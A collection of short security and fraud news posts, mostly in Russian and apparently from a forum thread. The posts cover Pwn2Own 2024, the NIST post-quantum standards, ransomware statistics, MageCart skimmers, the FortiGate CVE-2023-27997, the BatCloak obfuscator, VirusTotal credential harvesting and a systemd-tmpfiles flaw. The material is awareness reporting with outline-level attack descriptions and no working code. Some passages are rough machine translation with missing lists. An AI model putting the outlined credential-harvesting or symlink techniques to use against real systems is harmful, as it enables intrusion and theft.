По версии SEC, в 2018-м году лаатвиец запустил первичное размещение токенов (ICO) под названием Denaro. В течение всего трех месяцев он собрал около $11 млн и скрылся с деньгами американских иностранных инвесторов.
В другой схеме — Innovamine — латвиец обещал инвесторам большие прибыли с "облачного майнинга" криптовалют. По этой схеме он работал в период с апреля по июль 2019 года, и ему удалось присвоить $7 млн.
Кроме того, гражданин Латвии обвиняется в организации еще шести подобных схем. Чтобы придать им легитимности в глазах инвесторов, он использовал различные названия проектов и на короткий срок регистрировал компании в Великобритании.
В своем иске, поданном в Окружной суд США Восточного округа Нью-Йорка, SEC потребовала наложения запрета на участие этого гражданина Латвии в любых предложениях ценных бумаг и добивается возврата средств, полученных у американских инвесторов.
Однако, как уже сказано, это пока только версия обвинения.
" Но ему там грозит 100 лет тюрьмы!"
У защитников и обвинения по делу Аузиньша оказались разные мнения о том, каким должно быть это решение о выдаче. В прокуратуре Латвии настаивали, что Аузиньш, согласно международным договоренностям, должен быть выдан США.
- Преступление он совершил там. Если они попросят, расследуют, все докажут и пришлют нам дело, сказав, пожалуйста, осудите его, мы можем осудить его за содеянное в другой стране. Но еcли они желают сделать это сами, мы не можем чинить им препятствия. Согласно закону и правительственному договору, мы должны выдать его для следствия, - цитирует генерального прокурора Юриса Стуканса LTV.
С такой аргументацией были не согласны защитники Аузиньша. Они считают, что его нужно судить в Латвии, поскольку, совершая преступления, сам он физически находился именно здесь. Тем более, что Аузиньш признал вину и согласился сотрудничать со следствием.
- Нам кажется, что подход прокуратуры, изначально рассматривая американский запрос, был слишком формальным, без углубления в обстоятельства. Нас просят, мы формально выполняем это решение, арестовываем Ивара, отправляем его компьютер в Америку, и Ивара фактически даже не допрашивает американская сторона, - заявил адвокат Ивара Аузиньша Андрис Тауриньш.
Защитники выразили обеспокоенность, что в США их клиенту за совершенные им деяния может грозить более 100 лет заключения. В Латвии же максимальное наказание за аналогичное преступление – 10 лет.
В свою очередь в Генпрокуратуре настаивают, что Аузиньшу, при экстрадии в США, не грозит несоразмерно большой срок. Прокуратура получила гарантии от американской стороны, что в случае обвинительного приговора Аузиньш сможет отбывать наказание в Латвии и срок не будет длиннее установленного в латвийского Уголовном законе.
В итоге, как видим, Верховный суд Латвии дал разрешение на выдачу.
Для справки: с 1 января 2020 года до конца 2021 года Латвия выдала для суда в Евросоюз и третьи страны 56 человек. Двух из них – в США.
Стартовал Pwn2Own Vancouver 2024 за первый день которого участники продемонстрировали эксплуатацию 0-day в Windows 11, Tesla и Ubuntu Linux, выиграв 732 500$ и автомобиль Tesla Model 3.
Haboob SA реализовал эксплойт Adobe Reader, который сочетал в себе обход ограничений API и ошибку внедрения команд, добившись RCE на macOS и заработав 50 000$.
Synacktiv выиграла Tesla Model 3 и 200 000$ после взлома электронного блока управления Tesla с помощью Vehicle (VEH) CAN BUS Control менее чем за 30 секунд с использованием целочисленного переполнения.
Исследователи Theori сорвали куш в 130 000$, продемонстрировав RCE в VMware Workstation с использованием цепочки эксплойтов, нацеленной на ошибку неинициализированной переменной, слабость UAF и переполнение буфера на основе кучи.
Спецы из Reverse Tactics заработали 90 000$, воспользовавшись двумя ошибками Oracle VirtualBox и Windows UAF.
DEVCORE получила награду в размере 30 000$ за повышение привилегий в полностью исправленной системе Windows 11 с помощью эксплойта, нацеленного на две ошибки, включая состояние гонки TOCTAU.
Еще 10 000$ им ушло за демонстрацию уже известного эксплойта локального повышения привилегий (LPE) в Ubuntu Linux.
KAIST Hacking Lab взломали веб-браузер Google Chrome, используя Use-After-Free (UAF), и получили 60 000$.
ASU SEFCOM продемонстрировал еще один эксплойт LPE, нацеленный на Ubuntu Linux, с помощью условия гонки, заработав 20 000$.
Коди Галлахер также выиграл 20 000$ за 0-day в Oracle VirtualBox (OOB), которую также за 20 000$ взломала Dungdm из Viettel Cyber Security, используя цепочку эксплойтов из двух ошибок.
Первый день конкурса завершился тем, что Манфред Пол взломал веб-браузеры Apple Safari, Google Chrome и Microsoft Edge, воспользовавшись тремя 0-day и выиграв 102 500 долларов.
После Pwn2Own у поставщиков будет 90 дней на выпуск исправлений безопасности для всех обнаруженных недостатков, прежде чем Trend Micro Zero Day Initiative раскроет их публично.
Во второй день Pwn2Own участники попытаются реализовать 0-day в Windows 11, VMware Workstation, Oracle VirtualBox, Mozilla Firefox, Ubuntu Desktop, Google Chrome, Docker Desktop и Microsoft Edge.
• Source: <https://www.zerodayinitiative.com/blog/2024/3/19/pwn2own- vancouver-2024-the-full-schedule>
Национальный институт стандартов и технологий США (NIST) [представил](https://www.nist.gov/news-events/news/2024/08/nist-releases- first-3-finalized-post-quantum-encryption-standards) первые три стандарта, определяющие криптоалгоритмы, стойкие к подбору на квантовом компьютере. Первый стандартизированный алгоритм (CRYSTALS-Kyber) определяет способ инкапсуляции ключей и предназначен для шифрования обмена данными, а два других (CRYSTALS-Dilithium и Sphincs+) реализуют варианты формирования цифровых подписей, которые могут использоваться для решения задач, связанных с аутентификацией. Для того, чтобы избежать путаницы стандартизированные варианты алгоритмов переименованы: CRYSTALS-Kyber в ML-KEM, CRYSTALS-Dilithium в ML-DSA, а Sphincs+ в SLH-DSA. Выбранные алгоритмы разрабатываются с 2016 года и являются победителями ранее объявленного NIST конкурса по разработке алгоритмов постквантовой криптографии.
Активно развивающиеся последнее время квантовые компьютеры кардинально быстрее решают задачи разложения натурального числа на простые множители (RSA) и дискретного логарифмирования точек эллиптической кривой (ECDSA), которые лежат в основе современных асимметричных алгоритмов шифрования по открытым ключам, эффективно не решаемых на классических процессорах. На текущем этапе развития возможностей квантовых компьютеров пока недостаточно для взлома актуальных классических алгоритмов шифрования и цифровых подписей на базе открытых ключей, таких как ECDSA, но предполагается, что ситуация [может измениться](https://www.rand.org/pubs/commentary/2023/09/when-a-quantum- computer-is-able-to-break-our-encryption.html) уже в этом десятилетии.
Принятые стандарты:
• FIPS 203 - рассматривается как основной стандарт для шифрования данных, использующий алгоритм CRYSTALS- Kyber (ML- KEM - Module- Lattice Key-Encapsulation Mechanism) для организации обмена ключами между сторонами, выполняющими шифрование и расшифровку данных. Алгоритм CRYSTALS- Kyber использует методы криптографии, основанные на решении задач теории решёток, время решения которых не отличается на обычных и квантовых компьютерах. Достоинствами выбранного алгоритма являются относительно небольшой размер ключей и высокая скорость работы.
• FIPS 204 - первичный стандарт для формирования цифровых подписей, основанный на алгоритме CRYSTALS- Dilithium ([ML- DSA](https://csrc.nist.gov/csrc/media/Presentations/2024/falcon/images- media/prest-falcon-pqc2024.pdf) - Module-Lattice Digital Signature Algorithm), который как и CRYSTALS-Kyber базируется на теории решёток.
• FIPS 205 - альтернативный стандарт для формирования цифровых подписей, использующий алгоритм Sphincs+ (SLH- DSA - Stateless Hash-Based Digital Signature Algorithm), который применяет методы криптографии на основе хеш- функций. Sphincs+ отстаёт от CRYSTALS-Dilithium по размеру подписей и скорости работы, но базируется на совершенно иных математических принципах, т.е. останется эффективен в случае компрометации алгоритмов на основе теории решёток.
Кроме того, до конца года планируется утвердить четвёртый стандарт - FIPS 206, предназначенный для работы с цифровыми подписями и основанный на алгоритме FALCON, который как и алгоритмы CRYSTALS-Kyber и CRYSTALS-Dilithium основан на решении задач теории решёток, но в отличие от них ориентирован на применения, в которых требуется минимальный размер подписи. Стандартизированный вариант алгоритма FALCON будет поставляться под именем FN-DSA (FFT (быстрое преобразование Фурье) over NTRU-Lattice Digital Signature Algorithm). До конца года также планируется выбрать алгоритмы для создания альтернативных стандартов общего шифрования, которые будут основаны на иных принципах работы, чем задействованные в стандарте FIPS 203 на базе алгоритма CRYSTALS-Kyber.
В Дубае прошла конференция Token 2049, посвящённая блокчейну. На мероприятии выступили Павел Дуров и гендиректор Tether — Паоло Ардоино. Павел Дуров рассказал о том, как сейчас развивается блокчейн TON и какие изменения ждут мессенджер Telegram. Если коротко: в Telegram грядёт тотальная токенизация.
По всей видимости, Telegram ждёт плотная интеграция с криптовалютой TON, которая наблюдается уже сейчас. Сам мессенджер превратится в суперприложение, которое будет предоставлять пользователям доступ к контенту, возможности заработка, покупкам товаров и услуг.
Основные нововведения:
Telegram станет «первой социальной платформой, которая токенизирует всё пользовательское пространство». Из юзернеймов в мессенджере можно будет делать NFT, их можно будет продавать, покупать, закреплять за своим аккаунтом и так далее. Владельцы будут получать 95% доходов от продаж NFT. Дуров также раскрыл статистику по продажам юзернеймов в Telegram на платформе Fragment — более $350 млн за полтора года. Если учесть, что 95% дохода от продаж получают продавцы, платформа заработала около $17 млн;
Токенизация стикеров. Стикеры также можно будет превращать в невзаимозаменяемые токены, а также целые паки стикеров и эмодзи. «700 млрд пользователей ежемесячно делятся стикерами в Telegram, а количество самих стикеров невероятно» — добавил Дуров;
Через несколько недель у пользователей Telegram появится возможность покупать цифровые товары от разработчиков приложений через мини-приложения. Возможность продажи физических товаров уже существовала, а вот цифровые товары ранее не предлагались. «Мы немного ограничены внутренними механизмами транзакций, но вывод средств будет происходить через TON, и это будет очень просто», — пообещал создатель платформы. Разработчики приложений смогут рассчитывать на 70% дохода от продаж;
Сами мини-приложения станут доступнее. У пользователей платформы появится возможность создавать мини-приложения и ботов даже без способностей к написанию кода. Дуров отмечает, что в настоящее время мини-приложениями ежемесячно пользуются 360 млн человек. При активном продвижении новых функций Telegram рассчитывает увеличить эту цифру вдвое.
Поддержка авторов контента также станет проще: пользователи смогут поддержать любимых создателей и авторов контента через механизм чаевых;
Администраторы Telegram-каналов вне России начнут получать первые выплаты в TON за размещение рекламы. Как напомнил Павел Дуров, сейчас авторы каналов получают 50% доходов от размещения рекламы. Скоро они будут получать 70% при получении доходов в TON.
«Чтобы сделать это всё возможным, мы должны положиться на блокчейн TON», — заключил Павел Дуров. Тем не менее, после его выступления TON показал небольшое снижение, выйдя на цену в $7.
Что касается Паоло Ардуино, то глава Tether объявил о намерении интегрировать USDT на платформе TON. По его словам, это откроет «новые горизонты для криптовалютного мира».
Полиция Нидерландов арестовала 39-летнего мужчину по подозрению в отмывании средств, украденных с помощью вредоносного обновления криптокошелька Electrum.
Согласно заявлению, подозреваемый отмыл «десятки миллионов евро». Его смогли отследить через биткоин-транзакции.
По данным правоохранителей, первую криптовалюту он переводил в конфиденциальную монету Monero (и наоборот), используя децентрализованную платформу Bisq.
Криптовалюта, как и обычные деньги, уязвима для всех видов преступлений. В частности, возможности для злоумышленников предоставляет анонимный и трансграничный характер цифровых активов. Они могут получать их, например, путем вымогательства, взлома или мошенничества.
Click to expand...
Мужчину арестовали 6 сентября в городке Венендал в провинции Утрехт. 8 сентября он вышел на свободу, но остается под следствием.
При обыске у подозреваемого изъяли несколько электронных носителей информации и не названную сумму в криптовалютах.
source: politie.nl/nieuws/2022/september/13/03-man-opgepakt-witwassen- cryptovaluta.html
Согласно отчету исследователей Dragos , атаки программ-вымогателей на промышленные системы продолжались во 2 квартале 2022 года, и было выявлено 125 инцидентов.
Благодаря публично обнародованным инцидентам, сетевой телеметрии и публикациям в темной сети компания отслеживает 43 различных группы программ-вымогателей, при этом только 23 группы были активны во втором квартале 2022 года.
Эксперты обнаружили всего 125 атак во 2 квартале 2022 года. Это меньше, чем 158 атак в первом квартале. Dragos объяснил спад атак распадом Conti , на которую ранее приходилось около 25% атак на промышленные организации и инфраструктуру.

Из общего количества атак на промышленные организации приходится:
Европа – 46 атак;
Северная Америка – 36;
Азия – 32;
Южная Америка – 6;
Ближний Восток – 4;
Африка – 1.
По данным Dragos, 86 атак были нацелены на системы производственных организаций, а 10 атак были против предприятий пищевой промышленности и производства напитков, а также энергетических компаний.
Большинство атак на обрабатывающую промышленность затронули автомобильные компании, производителей металлических изделий и компаний, работающих со строительными материалами и одеждой. Атаки на производственные фирмы также оказали влияние на другие организации, использующие материалы и товары, производимые этими фабриками.
Согласно анализу исследователей, от общего числа вымогательских атак во 2 квартале 2022 года несколько группировок составили следующие доли:
Lockbit 2.0 - 33%;
Conti - 13%;
Black Basta - 12%;
Quantum - 7%;
AlphaV - 4%;
Hive - 4%.

Lockbit 2.0 сохранила то же количество атак, что и в прошлом квартале. Это свидетельствует о том, что группа продолжает поддерживать тот же уровень работы. Кроме того, Conti, Lockbit 2.0 и Black Basta продолжают атаковать промышленные организации, большинство жертв приходится на производственный сектор. Эксперты отметили, что LockBit была единственной группой, которая атаковала секторы фармацевтики, добычи полезных ископаемых и очистки воды.
По словам Dragos, в 3 квартале группы продолжат атаковать промышленный сектор, отключая ОТ-системы для распространения в сети организации.
Ранее команда NCC Group выявила общее снижение числа вымогательских атак . Недавнее расформирование группировки Conti, а также сезонные колебания - две возможные причины снижения активности вредоносных программ.
source: dragos.com/blog/dragos-industrial-ransomware-analysis-q2-2022
МОСКВА, 20 января. /ТАСС/. Сотрудники полиции задержали двух жительниц Волгограда, которые подозреваются в организации финансовой пирамиды и хищении денег у населения. Как сообщила ТАСС в четверг официальный представитель МВД России Ирина Волк, в организацию обратились более 600 человек, взявшие кредиты на 100 млн рублей.
"Учредительница микрокредитной организации и ее помощница разработали и реализовали схему, устроенную по принципу финансовой пирамиды. Они убеждали граждан взять в банках крупные займы и инвестировать их в свою организацию, которая якобы занимается более прибыльными проектами и нуждается в оборотных средствах", - сказала Волк.
По ее словам, злоумышленницы сразу же отдавали заемщикам часть полученных денег и обещали самостоятельно вносить в банки ежемесячные платежи. В течение первых нескольких месяцев они выполняли обещания за счет средств новых клиентов, а затем выплаты прекращались. При этом полученные деньги злоумышленницы тратили на покупку коммерческой недвижимости, элитных квартир, автомобилей премиум-класса и предметов роскоши.
"В настоящее время получено более 200 заявлений от потерпевших, каждый из которых отдал микрокредитной компании от 1 до 8,5 млн рублей. Однако известно, что в организацию обратились более 600 человек, взявших кредиты на общую сумму порядка 100 млн рублей. Подозреваемые были задержаны оперативниками в аэропорту Волгограда при попытке покинуть пределы региона", - добавила представитель МВД.
По местам жительства задержанных и офисах провели обыски, при которых изъяли электронные носители информации, средства связи, банковские карты, наличные деньги, кредитные договоры, черновые записи и другие предметы, имеющие доказательственное значение. Возбудили уголовное дело по статье о мошенничестве (ч. 4 ст. 159 УК РФ).
Задержали еще двоих фигурантов, которые подозреваются в причастности к криминальному бизнесу. Следователи и оперативники проводят работу по установлению личностей всех потерпевших от противоправных действий.
abusing the Ngrok platform in a fresh phishing campaign.
Researchers at the threat intelligence firm Cyble discovered a new wave of
phishing attacks targeting multiple organizations that are abusing the ngrok
platform, a secure and introspectable tunnel to the localhost.
ngrok is a cross-platform application used to expose a local development
server to the Internet, the server appears to be hosted on a subdomain of
ngrok (e.g., 4f421deb219c[.]ngrok[.]io) by creating a long-lived TCP tunnel to
the localhost. The experts pointed out that ngrok server software runs on a
VPS or a dedicated server and can bypass NAT mapping and Firewall restriction.
Threat actors are abusing the protocol for multiple malicious purposes.
“Multiple threat actors have abused the ngrok platform to gain unauthorized access to the target for delivering the additional payload, exfiltrating financial data such as credit/debit card information, and carrying out targeted phishing attacks.”[reads](https://cybleinc.com/2021/02/15/ngrok- platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/) the post published by Cyble.
Experts pointed out that attacks abusing the ngrok platform are hard to detect
because connections to subdomains of ngrok.com are not filtered by security
measures.
Experts provided a list of
[ngrok](https://securityaffairs.co/wordpress/76438/malware/ngrok-mining-
botnet.html)-based attacks conducted by [cybercrime
organizations](https://securityboulevard.com/2019/05/digital-criminals-
abusing-secure-tunneling-service-to-deliver-lokibot/) and nation-stated actors
such as [Fox Kitten](https://securityboulevard.com/2019/05/digital-criminals-
abusing-secure-tunneling-service-to-deliver-lokibot/) and [Pioneer
Kitten](https://securityboulevard.com/2019/05/digital-criminals-abusing-
secure-tunneling-service-to-deliver-lokibot/) APT groups.
The experts reported multiple malware strains and phishing campaigns abusing ngrok tunnelling, including
Some of the new strains of malware/phishing campaign using ngrok tunneling are:
Cyble focuses on threat actors abusing ngrok.io to deliver phishing attacks.
“Interestingly, we found multiple ngrok.io links used in darkweb markets/leaks and cybercrime forums by different threat actors such as BIN CARDERS, Telegram- carder data, and linlogpass.” continues Cybler.
Cyble also spotted a phishing tool kit, named “KingFish3 (Social master), advertised on a cybercrime forum. The experts discovered that a threat actor shared on the forum a Github link to the tool, which also abuses ngrok tunnels to carry out the attack.
Below the steps identified by the experts to abuse the ngrok tunnels and carry out phishing attacks:
The post includes a partial list of ngrok based phishing Indicators of Compromise (IOCs).
Below, Cyble experts’ recommendations:
На Черниговщине полицейские ликвидировали сеть мошеннических колл-центров. Всего от противоправных действий потерпевшие понесли убытки на более 5,4 миллиона гривен.
Полицейским Черниговщины удалось разоблачить группу мошенников из Нежина и Прилук, которые представлялись сотрудниками банковских учреждений для завладения реквизитами карточек граждан. Полиция провела ряд обысков у 21 фигуранта и прекратила деятельность сети мошеннических колл-центров.
Следствием было установлено, что группа жителей Нежина и Прилук, имея целью мошенническую деятельность, создали бот в одном из мессенджеров. Впоследствии злоумышленники под разными предлогами побудили граждан, заинтересовавшихся их предложениями, предоставлять реквизиты своих банковских карт. Завладев конфиденциальной информацией, члены группы с использованием специального программного обеспечения получали беспрепятственный доступ к интернет-банкингу пострадавших. Чужими деньгами они рассчитывались преимущественно за разнообразную компьютерную и бытовую технику для собственного потребления.
От противоправных действий потерпевшие понесли убытки на более 5,4 миллиона гривен.
Полицейские провели более 20 санкционированных обысков - в колл-центрах, у фигурантов и в помещениях, принадлежащих им или находящихся в их пользовании. В результате изъяты десятки компьютеров и других электронных устройств, более трех сотен сим-карт, черновая документация, банковские карты и почти 100 тысяч гривен наличными, другие вещественные доказательства.
Изъятое направлено на проведение экспертных исследований.
Продолжается досудебное расследование в уголовном производстве, открытом по ч. 4 статьи 190 Уголовного кодекса Украины (мошенничество, совершенное в крупных размерах, или путем незаконных операций с использованием электронно- вычислительной техники). Ее санкция предусматривает наказание в виде лишения свободы на срок от трех до восьми лет.
Using the vulnerability, the malicious application can perform arbitrary code
on the device with the privileges of the kernel.
Apple has released corrections for the zero day vulnerability in iOS, iPados
and MacOS, already operating in real hacker attacks.
Vulnerability (CVE-2021-30807) affects iomobileFramebuffer - the extension of the kernel that allows developers to control how the device's memory supports a frameBuer (memory area for short-term storage of one or more frames in digital form before sending it to the device).
Using the vulnerability, the malicious application can perform arbitrary code on the device with the privileges of the kernel. The privileges of the kernel give an attacker the opportunity to get complete control over a vulnerable device, be it iPhone, iPad, laptop or computer running MacOS.
According to Apple's notification of security for IOS / iOS / iPados and MacOS, the company knows that the aforementioned vulnerability could have already been operated by hackers, but it did not provide any details.
One of the security researchers published on Twitter POC-Explit for vulnerability. Another researcher who said that discovered this vulnerability regardless of others, published a detailed description of the problem. According to him, he was going to provide his report on the vulnerability of Apple, but she was ahead of him by releasing the patch. Users are highly recommended to update their devices to MacOS Big Sur 11.5.1, iOS 14.7.1 and iPados 14.7.1, in which CVE-2021-30807 has already been fixed. Updates are available for MacOS computers and laptops, as well as for iPhone 6S and later models, iPad Pro (all models), iPad Air 2 and later, fifth generation iPad and later, iPad mini 4 and later and iPod Touch (seventh generation). This is already the thirteenth vulnerability of the zero day, corrected by Apple this year.
Специалисты Malwarebytes обнаружили интересный MageCart-скрипт (веб-скиммер), который не просто заражает интернет-магазины и похищает данные банковских карт их посетителей, но паразитирует на малвари других хакеров.
Напомню, что изначально название MageCart было присвоено одной хак-группе, которая первой начала внедрять веб-скиммеры (вредоносные JavaScript) на страницы интернет-магазинов для хищения данных банковских карт. Но такой подход оказался настолько успешным, что у группировки вскоре появились многочисленные подражатели, а название MageCart стало нарицательным, и теперь им обозначают целый класс подобных атак.
Исследователи обнаружил новый скиммер, когда расследовали волну взломов интернет-магазинов, работающих под управлением устаревшей Magento 1. Хотя само по себе присутствие малвари на таких сайтах неудивительно, интересным оказался заразивший их вредонос.
«Злоумышленники разработали специальную версию скрипта, которая знает о сайтах, уже зараженных другим скиммером для Magento 1. Второй скиммер просто собирает данные кредитных карты из уже существующих фейковых форм, которые были внедрены на сайт предыдущими злоумышленниками», — пишут аналитики Malwarebytes.
Click to expand...
[](https://xakep.ru/wp- content/uploads/2021/02/338512/skimmer2_-1.png)
Поддельная форма и вредоносный код
Одним из пострадавших от этих атак стала компания Costway, использовавшая Magento 1 для своих интернет-магазинов во Франции, Великобритании, Германии и Испании.
То есть первая хак-группа взломала сайты компании и внедрила них поддельные платежные формы, ворующие финансовые данные покупателей. Вторая хак-группа дополнительно загрузила на эти сайты собственные кастомные веб-скиммеры с домена securityxx[.]top. Так, один скрипт собирает данные из уже существующего скиммера первой группировки, а второй активируется лишь в том случае, если магазин был очищен от малвари, введенной во время изначального взлома Magento 1.
[](https://xakep.ru/wp- content/uploads/2021/02/338512/traffic.png)
Трафик трех скиммеров
Таким образом, две хакерские группировки внедрили на сайты взломанных магазинов три разных MageCart-скрипта. Исследователи отмечают, что такие ситуации не редкость и MageCart-группировки нередко конкурируют между собой, уничтожая или пытаясь использоваться малварь своих «коллег по цеху».
Источник: xakep.ru/2021/02/03/skimming-wars/
Сотни тысяч брандмауэров FortiGate все еще уязвимы перед критической проблемой CVE-2023-27997, хотя разработчики Fortinet еще месяц назад выпустили обновление, устраняющее этот баг.
Уязвимость CVE-2023-27997 позволяет осуществить удаленное выполнение кода и получила рейтинг 9,8 балла из 10 возможных по шкале CVSS. Баг возникает из-за переполнения буфера хипа в операционной системе FortiOS, которая объединяет все сетевые решения Fortinet для их интеграции в платформу Security Fabric.
Фактически баг позволяет неаутентифицированному злоумышленнику удаленно выполнить произвольный код на устройстве с интерфейсом SSL VPN, доступном через интернет. В середине июня текущего года производитель [предупреждал](https://www.fortinet.com/blog/psirt-blogs/analysis-of- cve-2023-27997-and-clarifications-on-volt-typhoon-campaign), что эта проблема могла использоваться в хакерских атаках.
Уязвимость была устранена 11 июня 2023 года, и прежде чем сообщить о ней публично, разработчики выпустили обновления FortiOS 6.0.17, 6.2.15, 6.4.13, 7.0.12 и 7.2.5.
Как теперь сообщают исследователи из компании [Bishop Fox](https://bishopfox.com/blog/cve-2023-27997-exploitable-and-fortigate- firewalls-vulnerable), несмотря на все призывы Fortinet срочно установить патчи, более 300 000 брандмауэров FortiGate по-прежнему уязвимы для атак и доступны через интернет.
Чтобы собрать эту статистику, исследователи использовали Shodan для поиска устройств с незащищенным интерфейсом SSL VPN. Они отфильтровали результаты, обнаруживая перенаправления на /remote/login, что является верным признаком открытого интерфейса SSL VPN.
[](https://xakep.ru/wp- content/uploads/2023/07/428494/shodan.jpg)
В итоге запрос помог обнаружить 489 337 устройств, хотя не все они были уязвимы для CVE-2023-27997. Так, в ходе дальнейшего анализа исследователи обнаружили, что 153 414 устройств все же получили обновления до новых версий FortiOS.
Но это означает, что около 335 900 брандмауэров FortiGate, доступных через интернет, до сих пор уязвимы для атак на CVE-2023-2799. К сожалению, это значительно превышает оценку в 250 000 уязвимых устройств, которую ИБ-эксперты давали ранее.
Хуже того, специалисты Bishop Fox выяснили, что многие доступные в сети устройства FortiGate вообще не получали никаких обновлений в течение последних восьми лет. Некоторые из них до сих пор работают под управлением FortiOS 6, поддержка которой закончилась еще в прошлом году. В итоге такие устройства уязвимы сразу перед несколькими критическими багами, для которых давно доступны PoC-эксплоиты.
Также исследователи приложили к своему отчету демонстрацию работы PoC- эксплоита для CVE-2023-27997, подчеркивая, что уязвимость можно использовать для удаленного выполнения кода на уязвимых девайсах. Работу этого эксплоита, созданного для проверки устройств клиентов Bishop Fox, можно увидеть ниже.
[](https://xakep.ru/wp- content/uploads/2023/07/428494/cve-2023-27997.gif)
Прокуратура района Юэчэн города Шаосин (провинция Чжэцзян) расследовала дело об использовании счетов в цифровом юане (e-CNY) для обналичивания и отмывания денег. Об этом сообщают местные СМИ.
Группа из четырех человек находила торговцев, принимающих CBDC, и договаривалась с ними об обмене определенной суммы в цифровой валюте на наличные. Мерчанты получали комиссию в 1-1,5%.
Один из арестованных по имени Юань пояснил, что обнаружил предложение о возможности заработка на таких операция в интернете. Он получал 0,8% от оборачиваемых средств.
Чтобы масштабировать деятельность, Юань привлек к ней свою девушку и друга. Им он платил 0,5%. Подробностей о четвертом фигуранте дела не сообщается.
Всего за четыре дня в сентябре 2023 года группа обналичила более 200 000 e-CNY (~$25 255).
По словам Юаня, он не задумывался о происхождении денег. Согласно сообщению, транзакции в цифровых юанях строго конфиденциальны и зарубежные преступные группировки используют эту функцию для отмывания денег.
Для сокрытия своей деятельности, а также из-за небольшого количества работающих с цифровым юаней торговцев, группа выезжала для их поиска в соседние города. Для правоохранителей сигналом тревоги послужили аномальные потоки e-CNY через счета некоторых мерчантов в Шаосине, после чего они быстро вышли на Юаня и его сообщников.
Суд приговорил фигурантов к тюремным срокам от 16-19 месяцев и штрафам за отмывание доходов, полученных преступным путем.
Киберпреступники добились определённых успехов с помощью движка для обфускации вредоносных программ — BatCloak. Атаки с его использованием фиксируются с сентября 2022 года и позволяют зловредам обойти защитные системы.
На эксплуатацию BatCloak обратили внимание специалисты компании Trend Micro. [По их словам](https://www.trendmicro.com/en_us/research/23/f/analyzing-the- fud-malware-obfuscation-engine-batcloak.html), движок позволяет злоумышленникам с лёгкостью загружать множество семплов вредоносов и эксплойтов в виде качественно обфусцированных пакетных файлов.
Около 79,6% от 784 изученных образцов не детектируются ни одним антивирусным движком. Такие результаты как раз наглядно демонстрируют возможности BatCloak по части обхода защитных систем.
По своей сути BatCloak является основой готового билдера пакетных файлов — Jlaive, способного обходить Antimalware Scan Interface (AMSI), а также сжимать и шифровать основной пейлоад.
В сентябре 2022 года пользователь GitHub и GitLab под ником ch2sh рекламировал этот инструмент в качестве «преобразователя EXE в BAT». Поскольку исходный код был общедоступен, ряд разработчиков доработали и перенесли его на язык Rust.
Конечный пейлоад обрабатывается с помощью трёх уровней: пакетного загрузчика, лоадеров C# и PowerShell. В этом случае пакетный загрузчик выступает как отправная точка для расшифровки и распаковки каждой ступени и извлечения скрытого вредоноса.
Эксперты отмечают, что BatCloak за время своего существования получил ряд важных обновлений и адаптаций. Последнюю на данный момент версию — ScrubCrypt — команда Fortinet FortiGuard Labs связывает с операцией криптоджекинга от группировки 8220.
Google ограничит установку приложений из сторонних сайтов в Android 13
А некоторые заблокирует без возможности установки
В Android 13 появилась новая функция безопасности, блокирующая установку на смартфон приложений из неизвестных источников, которые запрашивают доступ к службам специальных возможностей.Click to expand...
(c) [https://www.ferra.ru/news/apps/dopr...storonnikh-saitov-v- android-13-14-05-2022.htm](https://www.ferra.ru/news/apps/doprygalis-google- ogranichit-ustanovku-prilozhenii-iz-storonnikh-saitov-v- android-13-14-05-2022.htm)
И что с этим делать, господа?
Исследователи из SafeBreach обнаружили интересную особенность VirusTotal, популярного онлайн-сервиса для анализа подозрительных файлов, ссылок и IP- адресов. Оказалось, что его можно использовать для сбора учётных данных, украденных вредоносными программами.
Есть одно условие — потребуется лицензия VirusTotal, которая стоит 600 евро. Имея на руках эту лицензию, специалисты смогли собрать более миллиона логинов и паролей с помощью определённых поисковых запросов и нескольких инструментов.
Скомпрометированные учётные данные хранятся в специальных файлах, которые используют инфостилеры и кейлоггеры. В определённый момент эти файлы могут попасть на площадку VirusTotal, поскольку киберпреступники часто используют этот сервис.
Помимо этого, как объяснили специалисты SafeBreach, содержащие информацию файлы могут загрузить сторонние исследователи в области кибербезопасности, которые не до конца понимают их содержимое. Ещё один вектор — автоматическая загрузка подозрительных сущностей на VirusTotal.
И здесь мы подходим к интересному методу, о котором рассказали в SafeBreach. Аналогично поиску Google, который при определённом подходе может использоваться для вычисления уязвимых IoT-устройств, VirusTotal предоставляет набор API и инструментов (VT Graph, Retrohunt и т. п.), которые можно использовать для поиска украденных данных в файлах.
Чтобы доказать состоятельность своего метода, эксперты собрали список имён таких файлов и начали искать в их содержимом логины и пароли. Специалистам не потребовалось много времени, чтобы найти учётные данные от электронных ящиков, учёток в соцсетях, криптовалютных кошельков и банковских аккаунтов.
• Source: https://www.safebreach.com/blog/2022/the-perfect-cyber-crime/
Во входящей в состав systemd утилите systemd-tmpfiles выявлена уязвимость (CVE-2021-3997), позволяющая вызвать неконтролируемую рекурсию. Проблему можно использовать для организации отказа в обслуживании во время загрузки системы через создание в каталоге /tmp большого числа вложенных подкаталогов. Исправление пока доступно в форме патча. Обновления пакетов с устранением проблемы предложены в Ubuntu и SUSE, но пока недоступны в Debian, RHEL и Fedora (исправления на стадии тестирования).
При создании тысяч вложенных каталогов выполнение операции "systemd-tmpfiles --remove" приводит к аварийному завершению из-за исчерпания стека. Обычно утилита systemd-tmpfiles в одном вызове выполняет операции удаления и создания каталогов ("systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev"), при этом вначале выполняется удаление, а потом создание, т.е. крах на стадии удаления приведёт к тому, что не будут созданы важные для работы файлы, указанные в /usr/lib/tmpfiles.d/*.conf.
Также упоминается более опасный сценарий атаки на Ubuntu 21.04: так как из-за краха systemd-tmpfiles не создаётся файл /run/lock/subsys, а каталог /run/lock допускает запись для всех пользователей, атакующий может создать каталог /run/lock/subsys под своим идентификатором и через создание символических ссылок, пересекающихся с lock-файлами от системных процессов, организовать перезапись системных файлов.
Кроме того, можно отметить публикацию новых выпусков проектов Flatpak, Samba, FreeRDP, Clamav и Node.js, в которых устранены уязвимости:
• В корректирующих релизах инструментария для сборки самодостаточных пакетов Flatpak 1.10.6 и 1.12.3 устранены две уязвимости: [Первая уязвимость](https://github.com/flatpak/flatpak/security/advisories/GHSA-qpjc- vq3c-572j) ([CVE-2021-43860](https://security- tracker.debian.org/tracker/CVE-2021-43860)) позволяет при загрузке пакета из непроверенного репозитория через манипуляции с метаданными скрыть отображение определённых расширенных полномочий в процессе установки. Вторая уязвимость (без CVE) позволяет во время сборки пакета командой "flatpak-builder --mirror- screenshots-url" создать каталоги в области ФС за пределами сборочного каталога.
